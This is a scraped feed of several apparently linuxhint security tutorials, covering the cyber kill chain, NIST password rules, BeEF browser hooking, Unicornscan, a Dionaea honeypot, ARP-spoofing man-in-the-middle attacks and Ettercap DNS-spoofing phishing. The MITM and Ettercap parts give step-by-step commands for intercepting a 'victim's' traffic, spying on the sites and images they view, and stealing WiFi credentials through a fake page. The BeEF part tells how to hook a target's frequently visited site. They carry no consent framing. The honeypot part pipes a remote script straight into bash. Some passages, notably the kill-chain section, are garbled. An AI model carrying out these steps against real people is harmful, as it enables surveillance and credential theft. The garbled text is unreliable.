Cyber kill chain

The cyber kill chain (CKC) is a traditional security model that describes an old-school scenario, an external attacker taking steps to penetrate a network and steal its data-breaking down the attack steps to help organizations prepare. CKC is developed by a team known as the computer security response team. The cyber kill chain describes an attack by an external attacker trying to get access to data within the perimeter of the security

Each stage of the cyber kill chain shows a specific goal along with that of the attacker Way. Design your Cyber Model killing chain surveillance and response plan is an effective method, as it focuses on how the attacks happen. Stages include:

  • Reconnaissance
  • Weaponization
  • Delivery
  • Exploitation
  • Installation
  • Command and control
  • Actions on Objectives

Steps of the cyber kill chain will now be described:

Step 1: Reconnaissance

It includes the Harvesting of email addresses, information about the conference, etc. Reconnaissance attack means that it is an effort of threats to pick up data about network systems as much as possible before starting other more genuine hostile kinds of attacks. Reconnaissance attackers are of two types passive reconnaissance and active reconnaissance. Recognition Attacker focuses on “who,” or network: Who will probably focus on the privileged people either for System access, or access to “Network” confidential data focuses on architecture and layout; tool, equipment, and the protocols; and the critical infrastructure. Understand the victim’s behavior, and break into a house for the victim.

Step 2: Weaponization

Supply payload by coupling exploits with a backdoor.

Next, attackers will use sophisticated techniques to re-engineer some core malware that suits their purposes. The Malware may exploit previously unknown vulnerabilities, aka “zero-day” exploits, or some combination of vulnerabilities to quietly defeat the defenses of a network, depending on the attacker’s needs and abilities. By re-engineering the Malware, attackers reduce the chances that traditional security solutions will detect it. “The hackers used thousands of internet devices that are infected previously with a Malicious code – known as a “botnet” or, jokingly, a “zombie army” – forcing a particularly powerful distributed denial of Service Angriff (DDoS).

Step 3: Delivery

The attacker sends the victim malicious payload using email, which is just one of a great many the attacker may employ intrusion methods. There are over 100 Possible delivery methods.

Target:
Attackers start intrusion (weapons developed in the previous step 2). The basic two methods are:

  • Controlled delivery, which represents direct delivery, hacking an Open Port.
  • Delivery is released to the opponent, which transmits the Malware to the target by phishing.

This stage shows the first and most significant opportunity for defenders to obstruct an operation; however, some key capabilities and other highly valued information of data are defeated by doing this. At this stage, we measure the viability of the attempts at the fractional intrusion, which are hindered at the conveyance point.

Step 4: Exploitation

Once attackers identify a change in your system, they exploit the weakness and execute their attack. During the exploitation stage of the attack, the attacker and the host machine are compromised Delivery mechanism will typically take one of two measures:

  • Install the Malware (a dropper), which allows the execution of the attacker command.
  • Install and download Malware (a downloader)

In recent years, this has become an area of expertise within the hacking community that is often demonstrated at events like Blackhat, Defcon, and the like.

Step 5: Installation

At this stage, the installation of a remote access trojan or backdoor on the victim’s system allows the contender to maintain perseverance in the environment. Installing Malware on the asset requires end-user involvement by unwittingly enabling the malicious code. Action can be seen as critical at this point. A technique for doing this would be to implement a host-based intrusion prevention (HIPS) system to give caution or put a barrier to common paths, for example. NSA Job, RECYCLER. Understanding whether Malware requires privileges from the administrator or just from the user to execute the target is critical. Defenders must understand the endpoint auditing process to uncover abnormal creations of files. They need to know how to compile malware timing to determine whether it is old or new.

Step 6: Command and control

Ransomware uses Connections to control. Download the keys to encryption before you seize the files. Trojans remote access, for example, opens a command and control the connection so you can approach your system data remotely. This allows for continuous connectivity for the environment and the detective measure activity on the defense.

How does it work?

Command and control plan is usually performed via a beacon out of the grid over the allowed path. Beacons take many forms, but they tend to be in most cases:

HTTP or HTTPS

Seems benign traffic through falsified HTTP headers

In cases where the communication is encrypted, beacons tend to use auto signed certificates or custom encryption.

Step 7: Actions on Objectives

Action refers to the manner in which the attacker attains his final target. The attacker’s ultimate goal could be anything to extract a Ransom from you to decrypt files to Customer Information from the network. In the content, the latter example could stop the exfiltration of data loss prevention solutions before data leaves your network. Otherwise, Attacks can be used to identify activities that deviate from set baselines and notify IT that something is wrong. This is an intricate and dynamic assault process that can take place in months and hundreds of small steps to accomplish. Once this stage is identified within an environment, it is necessary to initiate the implementation of prepared reaction plans. At the very least, an inclusive communication plan should be planned, which involves the detailed evidence of information that should be raised to the highest-ranking official or administering board, the deployment of endpoint security devices to block information loss, and the preparation to brief a CIRT group. Having these resources well established ahead of time is a “MUST” in today’s rapidly evolving cybersecurity threat landscape.

]]>
NIST Password Guidelines https://linuxhint.com/nist_password_guidelines/ Wed, 16 Sep 2020 11:46:04 +0000 https://linuxhint.com/?p=68396 The National Institute of Standards and Technology (NIST) defines security parameters for Government Institutions. NIST assists organizations for consistent administrative necessities. In recent years, NIST has revised the password guidelines. Account Takeover (ATO) attacks have become a rewarding business for cybercriminals. One of the members of the top management of NIST expressed his views about traditional guidelines, in an interview “producing passwords that are easy to guess for bad guys are hard to guess for legitimate users.” (https://spycloud.com/new-nist-guidelines). This implies that the art of picking the most secure passwords involves a number of human and psychological factors. NIST has developed the Cybersecurity Framework (CSF) to manage and overcome security risks more effectively.

NIST Cybersecurity Framework

Also known as “Critical Infrastructure Cybersecurity,” the cybersecurity framework of NIST presents a broad arrangement of rules specifying how organizations can keep cybercriminals under control. The CSF of NIST comprises of three main components:

  • Core: Leads organizations to manage and reduce their cybersecurity risk.
  • Implementation Tier: Helps organizations by providing information regarding the organization’s perspective on risk management of cybersecurity.
  • Profile: Organization’s unique structure of its requirements, objectives, and resources.

Recommendations

The following include suggestions and recommendations provided by NIST in their recent revision of password guidelines.

  • Characters Length: Organizations can choose a password of a minimum character length of 8, but it is recommended highly by NIST to set a password of up to a maximum of 64-characters.
  • Preventing Unauthorized Access: In the case that an unauthorized person has tried to log in to your account, it is recommended to revise the password in case of an attempt to steal the password.
  • Compromised: When small organizations or simple users encounter a stolen password, they usually change the password and forget what happened. NIST suggests to list down all those passwords which are stolen for present and future use.
  • Hints: Ignore hints and security questions while choosing passwords.
  • Authentication Attempts: NIST strongly recommends restricting the number of authentication attempts in case of failure. The number of attempts is limited, and it would be impossible for hackers to try multiple combinations of passwords for login.
  • Copy and Paste: NIST recommends to use paste facilities in the password field for the ease of managers. Contrary to that, in previous guidelines, this paste facility was not recommended. Password managers use this paste facility when it comes to using a single master password to ingress available passwords.
  • Composition Rules: Composition of characters might result in dissatisfaction by the end-user, so it is recommended to skip this composition. NIST concluded that the user usually shows a lack of interest in setting up a password with composition of characters, which resultantly weakens their password. For example, if the user sets their password as ‘timeline,’ the system does not accept it and asks the user to use a combination of uppercase and lowercase characters. After that, the user must change the password by following the rules of the compositing set in the system. Therefore, NIST suggests to rule out this requirement of composition, as organizations may face an unfavorable effect on security.
  • Use of Characters: Usually, passwords containing spaces are rejected because space is counted, and the user forgets the space character(s), making the password difficult to memorize. NIST recommends using whatever combination the user wants, which can be more easily memorized and recalled whenever required.
  • Password Change: Frequent changes in passwords are mostly recommended in organizational security protocols or for any kind of password. Most users choose an easy and memoizable password to be changed in the near future to follow the security guidelines of organizations. NIST recommends to not change the password frequently and to choose a password that is complex enough so that it can be run for a long time to satisfy the user and the security requirements.

What if the Password is Compromised?

Hackers’ favorite job is to breach security barriers. For that purpose, they work to discover innovative possibilities to pass through. Security Breaches have countless combinations of usernames and passwords to break any security barrier. Most organizations also have a list of passwords accessible to hackers, so they block any password selection from the pool of password lists, which is also accessible to hackers. Keeping in view the same concern, if any organization is unable to access the password list, NIST has provided some guidelines that a password list can contain:

  • A list of those passwords that have been breached previously.
  • Simple words selected from the dictionary (e.g., ‘contain,’ ‘accepted,’ etc.)
  • Password characters that contain repetition, series, or a simple series (e.g. ‘cccc,’ ‘abcdef,’ or ‘a1b2c3’).

Why Follow the NIST Guidelines?

The guidelines provided by NIST keep in view the main security threats related to password hacks for many different kinds of organizations. The good thing is that, if they observe any violation of the security barrier caused by hackers, NIST can revise their guidelines for passwords, as they have been doing since 2017. On the other hand, other security standards (e.g., HITRUST, HIPAA, PCI) do not update or revise the basic initial guidelines that they have provided.

]]>
Hacking with BeEF https://linuxhint.com/hacking_beef/ Wed, 26 Aug 2020 20:16:00 +0000 https://linuxhint.com/?p=66437 Browser Exploitation Framework (BeEF) is a penetration testing, or pen-testing, tool designed to provide effective client-side attack vectors and to exploit any potential vulnerabilities in the web browser. BeEF is unique among pen-testing frameworks because it does not try to tackle the more secure network interface aspects of a system. Instead, BeEF clings on to one or more web browsers to use as a Pavillion for injecting payloads, executing exploit modules, and testing a system for vulnerabilities by sticking to browser influenced utilities.

BeEF has a very capable, yet straightforward, API that serves as the pivot upon which its efficiency stands and grows out into an imitation of a full-fledged cyber attack.

This short tutorial will take a look at several ways that this flexible and versatile tool can be of use in pen-testing.

Installing the BeEF Framework

A Linux OS such as Kali Linux, Parrot OS, BlackArch, Backbox, or Cyborg OS is required to install BeEF on your local machine.

Although BeEF comes pre-installed in various pen-testing operating systems, it might be possible that it is not installed in your case. To check if whether BeEF is installed, look for BeEF in your Kali Linux directory. To do so, go to applications>Kali Linux>System Services>beef start.

Alternatively, you can fire up BeEF from a new terminal emulator by entering the following code:

$ cd /usr/share/beef-xss
$ cd ./beef

To install BeEF on your Kali Linux machine, open the command interface and type in the following command:

$ sudo apt-get update
$ sudo apt-get install beef-xss

BeEF should now be installed under /usr/share/beef-xss.

You can start using BeEF using the address described previously in this section.

Welcome to BeEF

Now, you can see the BeEF GUI in its full glory. Access the BeEF server by launching your web browser and looking up the localhost (127.0.0.1).

You can access the BeEF web GUI by typing the following URL in your web browser:

http://localhost:3000/ui/authentication

The default user credentials, both the username and password, are “beef:”

$ beef-xss-1
$ BeEF Login Web GUI

Now that you have logged into the BeEF web GUI, proceed to the “Hooked Browsers” section. Online Browsers and Offline Browsers. This section shows the victim’s hooked status.

Using BeEF

This walkthrough will demonstrate how to use BeEF in your local network using the localhost.

For the connections to be made outside the network, we will need to open ports and forward them to the users waiting to connect. In this article, we will stick to our home network. We will discuss port forwarding in future articles.

Hooking a Browser

To get to the core of what BeEF is about, first, you will need to understand what a BeEF hook is. It is a JavaScript file, used to latch on to a target’s browser to exploit it while acting as a C&C between it and the attacker. This is what is meant by a “hook” in the context of using BeEF. Once a web browser is hooked by BeEF, you can proceed to inject further payloads and begin with post-exploitation.

To find your local IP address, you open a new terminal and enter the following:

$ sudo ifconfig

Follow the steps below to perform the attack:

  1. To target a web browser, you will first need to identify a webpage that the victim to-be likes to visit often, and then attach a BeEF hook to it.
  2. Deliver a javascript payload, preferably by including the javascript hook into the web page’s header. The target browser will become hooked once they visit this site.

If you have been able to follow these steps without any problems, you should be able to see the hooked IP address and OS platform in the BeEF GUI. You can find out more about the compromised system by clicking on the hooked browser listed in the window.

Also, there are several generic webpage templates they have made available for your use.

http://localhost:3000/demos/butcher/index.html

You can glean all sorts of information from here, such as the plugins and extensions that the browser is using, and various information about the hardware and software specs of the target.

The BeEF framework goes so far as to create complete logs of mouse movements, double-clicks, and other actions performed by the victim.

Here is a list of available modules that can be used to breach a designated system. These modules include keyloggers and spyware, including the ones that use the webcams and microphones of the target browser.

Note that certain commands have a colored icon. These icons all have different connotations that you can find out by taking the ‘getting started’ introductory tour, which introduces various aspects of the BeEF interface. Also, notice how each module has a traffic light icon associated with it. These traffic symbols are used to indicate any of the following:

  • The command module works against the target and should be invisible to the user
  • The command module works against the target but may be visible to the user
  • The command module has yet to be verified against this target
  • The command module does not work against this target

You can also send shell commands to the target system, as shown below:

Coupled with Metasploit, BeEF can be used to perform quite varied and intricate system exploitation using modules, such as browser_auto_pwn.

Conclusion

BeEF is an incredibly powerful tool that you can use to fortify systems against cyberattacks. From providing spyware modules to tracking mouse movement on the targeted system, BeEF can do it all. It is a good idea, therefore, to test your system using this security forensics tool.

Hopefully, you found this tutorial useful to get you started with this tool with such diverse, useful functionality.

]]>
Unicornscan: A beginner’s guide https://linuxhint.com/unicornscan_beginner_tutorial/ Tue, 25 Aug 2020 19:15:39 +0000 https://linuxhint.com/?p=66266 Port scanning is one of the most popular tactics in use by blackhat hackers. Consequently, it is also frequently used in Ethical hacking to check systems for vulnerabilities. Several tools facilitate portscanning, nmap, NetCat, Zenmap, being a notable few.

But today, we’ll talk about another great port scanner: Unicornscan, and how to use it in your next attempt at portscanning. Like other popular tools for portscanning such as nmap, it has several great features that are unique to itself. One such feature is that it can send out packets and receive them through two different threads, unlike other portscanners.

Known for its asynchronous TCP and UDP scanning capabilities, Unicornscan enables its users to discover details on network systems through alternative scanning protocols.

Unicornscan’s attributes

Before we attempt a network and port scan with unicornscan, let’s highlight some of its defining features:

  • Asynchronous stateless TCP scanning with each of the TCP flags or flag combinations
  • Asynchronous protocol-specific UDP scanning
  • superior interface for measuring a response from a TCP/IP enabled stimulus
  • Active and Passive remote OS and application detection
  • PCAP file logging and filtering
  • capable of sending packets with different OS fingerprints than the OS of the host.
  • Relational database output for storing the results of your scans
  • Customizable module support to fit according to the system being pentested
  • Customized data set views.
  • Has its TCP/IP stack, a distinguishing feature that sets it apart from other port scanners
  • Comes built into Kali Linux, no need to download

Performing a simple scan with Unicornscan

The most basic scan withUnicornscan allows us to scan a single host IP. Type the following in the interface to perform the basic scan with Unicornscan

$ sudo unicornscan 192.168.100.35

Here, we’ve tried this scan on a system with Win 7 connected to our network. The basic scan has listed all the TCP ports on the system we’re scanning. Notice the similarities to –sS scan in nmap, and how the key is that it doesn’t use ICMP by default. Out of the ports mentioned, only ports 135,139,445 and 554 are open.

Scanning multiple IPs wit Unicornscan

We will make a slight modification in the basic scan syntax to scan multiple hosts, and you’ll notice the subtle difference from scan commands we use in nmap and hping. The targets are placed in sequence to initiate scanning:

$ sudo unicornscan 192.168.100.35 192.168.100.45

Make sure you’re not placing any commas between the addresses, else the interface will not recognize the command.

Scanning Class C networks with Unicornscan

Let’s move on to scan our entire class C network. We will use a CIDR notation such as 192.168.1.0/24 to scan all 255 host IP addresses. If we were to find all the IPs with port 31 open, we’d add: 31 after the CIDC notation:

$ sudo unicornscan 192.168.100.35/24:31

Unicornscan has successfully returned us to all the hosts that have port 31 open. The cool thing about unicornscan is that it doesn’t stop at our network, where speed is a limiting factor. Suppose that all systems with ports 1020 open had a certain vulnerability. Without even having any idea about where these systems are, we can scan all of them. Although scanning such a large number of systems can take ages, it would be better if we divide them into smaller scans.

TCP scanning with Unicornscan

Unicornscan is well able to perform TCP scans as well. We’ll designate websiteX.com as our target and scan for ports 67 and 420. For this specific scan, we’ll be sending 33 packets per second. Before mentioning the ports, we’ll instruct unicornscan to send 33 packets per second by adding -r33 in the syntax and –mT to indicate we want to scan (m) using the TCP protocol. The website name shall proceed with these flags.

$ sudo unicornscan -r33 -mT linuxhint.com:67,420

UDP scanning:

We can also scan for UDP ports with unicornscan. Type:

$ sudo unicornscan -r300 -mU linuxhint.com

Notice that we’ve replaced the T with a U in the syntax. This is to specify that we’re looking for UDP ports since Unicornscan only sends TCP SYN packets by default.

Our scan has not reported any open UDP ports. This is because open UDP ports are typically a rare find. However, it is possible that you may come across an open 53 port or a 161 port.

Saving results to a PCAP file

You can export the received packets to a PCAP file at a directory of your choice and perform network analysis later. To find hosts with port 5505 open, type

$ sudo unicornscan 216.1.0.0/8:5505 -r500 -w huntfor5505.pcap
-W1 -s 192.168.100.35

Wrapping up -Why we recommend Unicornscan

Simply put, it does everything that a typical port scanner does and does it better. For example, scanning is much quicker with unicornscan than with other portscanners, because they use the target’s operating system’s TCP/IP stack. This comes in particularly handy when you’re scanning massive corporate networks as a pentester. You may come across hundreds of thousands of addresses, and time becomes a deciding factor of how successful the scan is.

Unicornscan Cheat Sheet

Here’s a quick cheat sheet to help with basic scans with Unicornscan that might come in handy.

SYN : -mT
ACK scan : -mTsA
Fin scan : -mTsF
Null scan : -mTs
Xmas scan : -mTsFPU
Connect Scan : -msf -Iv
Full Xmas scan : -mTFSRPAU
scan ports 1 through 5 : (-mT) host:1-5

Conclusion:

In this tutorial, I have explained the unicornscan tool and how to use it with an example. I hope you learn the basics, and this article helps you in pentesting via Kali Linux.

]]>
What is a Zero-Day Exploit? https://linuxhint.com/zero_day_exploit_beginners_tutorial/ Tue, 25 Aug 2020 19:07:28 +0000 https://linuxhint.com/?p=66282 A Zero-day exploit is the crown prize of hackers. A Zero-day exploit is where an attacker finds a vulnerability on a system that the vendor’s and the public’s not aware of. There is no patch and no system to protect against it except removing that service of the system. It’s called zero-day because there are zero days for software developers to patch the flaw, and nobody knows about this exploit that it is very dangerous.

For developing zero-day, there are two options either you develop your own or capture zero-day developed by others. Developing zero-day on your own can be a monotonous and long process. It requires great knowledge. It can take a lot of time. On the other hand, zero-day can be captured developed by others and can be reused. Many hackers use this approach. In this program, we set up a honeypot that appears as unsafe. Then we wait for the attackers to get attracted to it, and then their malware is captured when they broke into our system. A hacker can use the malware again in any other system, so the basic goal is to capture the malware first.

Dionaea:

Markus Koetter was the one who developed Dionaea. Dionaea is chiefly named after the plant carnivorous Venus flytrap. Primarily, it is a low interaction honeypot. Dionaea comprises of services that are attacked by the attackers, for instance, HTTP, SMB, etc., and imitates an unprotected window system. Dionaea uses Libemu for detecting shellcode and can make us vigilant about the shellcode and then capture it. It sends concurrent notifications of attack via XMPP and then records the information into an SQ Lite database.

Libemu:

Libemu is a library used for the detection of shellcode and x86 emulation. Libemu can draw malware inside the documents such as RTF, PDF, etc. we can use that for hostile behavior by using heuristics. This is an advanced form of a honeypot, and beginners should not try it. Dionaea is unsafe if it gets compromised by a hacker your whole system will get compromised and for this purpose, the lean install should be used, Debian and Ubuntu system are preferred.

I recommend not to use it on a system that will be used for other purposes as libraries and codes will get installed by us that may damage other parts of your system. Dionaea, on the other hand, is unsafe if it gets compromised your whole system will get compromised. For this purpose, the lean install should be used; Debian and Ubuntu systems are preferred.

Install dependencies:

Dionaea is a composite software, and many dependencies are required by it that are not installed on other systems like Ubuntu and Debian. So we will have to install dependencies before installing Dionaea, and it can be a dull task.

For example, we need to download the following packages to begin.

$ sudo apt-get install libudns-dev libglib2.0-dev libssl-dev libcurl4-openssl-dev
libreadline-dev libsqlite3-dev python-dev libtool automake autoconf
build-essential subversion git-core flex bison pkg-config libnl-3-dev
libnl-genl-3-dev libnl-nf-3-dev libnl-route-3-dev sqlite3

A script by Andrew Michael Smith can be downloaded from Github using wget.

When this script is downloaded, it will install applications (SQlite) and dependencies, download and configure Dionaea then.

$ wget -q https://raw.github.com/andremichaelsmith/honeypot-setup-script/
master/setup.bash -O /tmp/setup.bash && bash /tmp/setup.bash

Choose an interface:

Dionaea will configure itself, and it will ask you to select the network interface you want the honeypot to listen on after the dependencies and applications are downloaded.

Configuring Dionaea:

Now honeypot is all set and running. In future tutorials, I will show you how to identify the items of the attackers, how to set up Dionaea in real times of attack to alert you,

And how to look over and capture the shellcode of the attack. We will test our attack tools and Metasploit to check if we can capture malware before placing it live online.

Open the Dionaea configuration file:

Open the Dionaea configuration file in this step.

$ cd /etc/dionaea

Vim or any text editor other than this can work. Leafpad is used in this case.

$ sudo leafpad dionaea.conf

Configure logging:

In several cases, multiple gigabytes of a log file is seen. Log error priorities should be configured, and for this purpose, scroll down the logging section of a file.

Interface and IP section:

In this step, scroll down to the interface and listen to a portion of the configuration file. We want to have the interface to be set to manual. As a result, Dionaea will capture an interface of your own choice.

Modules:

Now the next step is to set the modules for the efficient functioning of Dionaea. We will be using p0f for operating system fingerprinting. This will help to transfer data into the SQLite database.

Services:

Dionaea is set up to run https, http, FTP, TFTP, smb, epmap, sip, mssql, and mysql

Disable Http and https because hackers are not likely to get fooled by them, and they are not vulnerable. Leave the others because they are unsafe services and can be attacked easily by hackers.

Start dionaea to test:

We have to run dionaea to find our new configuration. We can do this by typing:

$ sudo dionaea -u nobody -g nogroup -w /opt/dionaea -p /opt/dionaea/run/dionaea.pid

Now we can analyze and capture malware with the help of Dionaea as it is running successfully.

Conclusion:

By using the zero-day exploit, hacking can become easy. It is computer software vulnerability, and a great way to attract attackers, and anyone can be lured into it. You can easily exploit computer programs and data. I hope this article will help you learn more about Zero-Day Exploit.

]]>
ARP spoofing using a man-in-the-middle Attack https://linuxhint.com/arp_spoofing_using_man_in_the_middle_attack/ Thu, 20 Aug 2020 18:48:50 +0000 https://linuxhint.com/?p=65924

Performing Man In The Middle Attacks with Kali Linux

Man in the Middle attacks is some of the most frequently attempted attacks on network routers. They’re used mostly to acquire login credentials or personal information, spy on the Victim, or sabotage communications or corrupt data.

A man in the middle attack is the one where an attacker intercepts the stream of back and forth messages between two parties to alter the messages or just read them.

In this quick guide, we will see how to perform a Man in the Middle attack on a device connected to the same WiFi network like ours and see what websites are often visited by them.

Some pre-requisites

The method we’re going to use will employ Kali Linux, so it’ll help to have a certain degree of familiarity with Kali before we start.

To start with our attacks, the following are crucial prerequisites:

the network interface installed on our machine

and the IP of the WiFi router that our Victim uses.

View the network interface configuration

Run the following command in the terminal to find out the name of the network interface that you’re using:

$ sudo ifconfig

You will be displayed a long list of network interfaces, out of which you have to choose one and note it down somewhere.

As for the IP of the Router you’re using, use:

$ ip route show

On the terminal and you will be shown the IP of your network router. Now to do further processes, I have logged in to kali root mode.

STEP 1:Obtain the IP configuration from the Victim

Next up, you need to get the IP of your Victim’s Router. This is easy, and there are several different ways you can find it out. For instance, you can use a Network Monitoring Software Tool, or you can download a routers user interface program that lets you list all the devices and their IPs on a particular network.

STEP 2:Turn on the packet forwarding in Linux

This is very important because if your machine isn’t exchanging packets, the attack will result in a failure as your internet connection will be disrupted. By enabling the packet forwarding, you disguise your local machine to act as the network router.

To turn on packet forwarding, run the following command in a new terminal:

$ sysctl -w net.ipv4.ip_forward=1

STEP 3: Redirect packages to your machine with arpspoof

Arpspoof is a preinstalled Kali Linux utility that lets you expropriate traffic to a machine of your choice from a switched LAN. This is why Arpspoof serves as the most accurate way to redirect traffic, practically letting you sniff traffic on the local network.

Use the following syntax to start intercepting packages from the Victim to your Router:

$ arpspoof -i [Network Interface Name] -t [Victim IP] [Router IP]

This has only enabled the monitoring the incoming packets from the Victim to the Router. Do not close the terminal just yet as it’ll stop the attack.

STEP 4: Intercept packages from the Router

You’re doing here the same as the previous step, except it’s just reversed. Leaving the previous terminal open as it is, opens up a new terminal to start extracting packages from the Router. Type the following command with your network interface name and router IP:

$ arpspoof -i [Network Interface Name] -t [Router IP] [Victim IP]

You’re probably realizing at this point that we’ve switched the position of the arguments in the command we used in the previous step.

Up till now, you’ve infiltrated to the connection between your Victim and the Router

STEP 5: Sniffing images from the target’s browser history

Let’s see what websites our target like to visit often and what images do they see there. We can achieve this using specialized software called driftnet.

Driftnet is a program that lets us monitor the network traffic from certain IPs and discern images from TCP streams in use. The program can display the images in JPEG, GIF, and other image formats.

To see what images are being seen on the target machine, use the following command

$ driftnet -i [Network Interface Name]

STEP 6: Sniffing URLs information from victim navigation

You can also sniff out the website’s URL that our Victim often visits. The program we’re going to use is a command-line tool known as urlsnarf. It sniffs out and saves the HTTPs request from a designated IP in the Common log format. Fantastic utility to perform offline post-processing traffic analysis with other network forensics tools.

The syntax you’ll put in the command terminal to sniff out the URLs is:

$ urlsnarf -i [Network interface name]

As long as each terminal is functional and you’ve accidentally not closed one of them, things should’ve gone smoothly for you so far.

Stopping the attack

Once you’re satisfied with what you’ve got your hands on, you may stop the attack by closing each terminal. You can use the ctrl+C shortcut to go about it quickly.

And don’t forget to disable packet forwarding that you had enabled to carry out the attack. Type in the following command in the terminal:

$ sysctl -w net.ipv4.ip_forward=0

Wrapping things up:

We’ve seen how to infiltrate a system through MITM attack and seen how to get our hands on the browser history of our Victim. There’s a whole lot you can do with the tools we’ve seen in action here, so make sure to go about seeing out walkthroughs on each of these sniffing and spoofing tools.

We hope you’ve found this tutorial helpful and that you’ve successfully carried out your first Man In the Middle attack.

]]>
Man in the middle attacks https://linuxhint.com/mimt_attacks_linux/ Thu, 20 Aug 2020 17:54:05 +0000 https://linuxhint.com/?p=65898 You are probably already familiar with the man in the middle attacks: the attacker covertly intercepts the messages between two parties by tricking each into thinking that they’ve established communication with the intended party. Being able to intercept messages, an attacker can even influence communication by injecting false messages.

One example of such attacks is where a victim logs into a wifi network, and an attacker on the same network gets them to give away their user credentials at a fishing page. We will be talking about this technique in particular, which is also known as phishing.

Although it is detectable through authentication and tamper detection, it’s a common tactic used by many hackers who manage to pull it off on the unsuspecting. Therefore it’s worth knowing how it works to any cybersecurity enthusiast.

To be more specific about the demonstration we’re presenting here, we will be using man in the middle attacks redirecting oncoming traffic from our target to a false webpage and reveal WiFI passwords and usernames.

The procedure

Although, there’re more tools in kali Linux that are well suited to execute MITM attacks, we’re using Wireshark and Ettercap here, both of which come as pre-installed utilities in Kali Linux. We might discuss the others that we could’ve used instead in the future.

Also, we’ve demonstrated the attack on Kali Linux live, which we also recommend our readers to use when carrying out this attack. Though, it is possible that you’d end up with the same results using Kali on VirtualBox.

Fire-up Kali Linux

Launch the Kali Linux machine to get started.

Set up the DNS config file in Ettercap

Setup the command terminal and change the DNS configuration of the Ettercap by typing the following syntax into the editor of your choice.

$ gedit /etc/ettercap/etter.dns

You will be displayed the DNS configuration file.

Next, you’ll need to type your address in the terminal

>* a 10.0.2.15

Check your IP address by typing ifconfig in a new terminal if you don’t already know what it is.

To save changes, press ctrl+x, and press (y) bottom.

Prepare the Apache server

Now, we will move our fake security page to a location on the Apache server and run it. You will need to move your fake page to this apache directory.

Run the following command to format the HTML directory:

$ Rm /Var/Www/Html/*

Next up, you’ll need to save your fake security page and upload it to the directory we’ve mentioned. Type the following in the terminal to start the upload:

$ mv /root/Desktop/fake.html /var/www/html

Now fire up the Apache Server with the following command:

$ sudo service apache2 start

You’ll see that the server has successfully launched.

Spoofing with Ettercap addon

Now we’ll see how Ettercap would come into play. We will be DNS spoofing with Ettercap. Launch the app by typing:

$ettercap -G

You can see that it’s a GUI utility, which makes it much easier to navigate.

Once the addon has opened, you hit the ‘sniff bottom’ button and choose United sniffing

Select the network interface that’s in your use at the moment:

With that set, click on the host tabs and choose one of the lists. If there’s no appropriate host available, you may click the scan host to see more options.

Next, designate the victim to target 2and your IP address as target 1. You can designate the victim by clicking on the target two-button and then on add to the target button.

Next, hit the mtbm tab and select ARP poisoning.

Now navigate to the Plugins tab and click on the “Manage the plugins” section and then activate DNS spoofing.

Then move to the start menu where you may finally begin with the attack.

Catching the Https traffic with Wireshark

This is where it all culminates into some actionable and relevant results.

We will be using Wireshark to attract the https traffic and try to retrieve the passwords form it.

To launch Wireshark, summon a new terminal and enter Wireshark.

With Wireshark up and running, you must instruct it to filter out any traffic packets other than the https packets by typing HTTP in the Apply a display filter and hit the enter.

Now, Wireshark will ignore every other packet and only capture the https packets

Now, look out for each, and every packet that contains the word “post” in its description:

Conclusion

When we talk about hacking, MITM is a vast area of expertise. One specific type of MITM attack has several different unique ways they can be approached, and the same goes for phishing attacks.

We’ve looked at the simplest yet very effective way to get hold of a whole lot of juicy information that may have future prospects. Kali Linux has made this sort of stuff really easy since its release in 2013, with its built-in utilities serving one purpose or another.

Anyway, that’s about it for now. I hope you’ve found this quick tutorial useful, and hopefully, it has helped you get started with phishing attacks. Stick around for more tutorials on MITM attacks.

]]>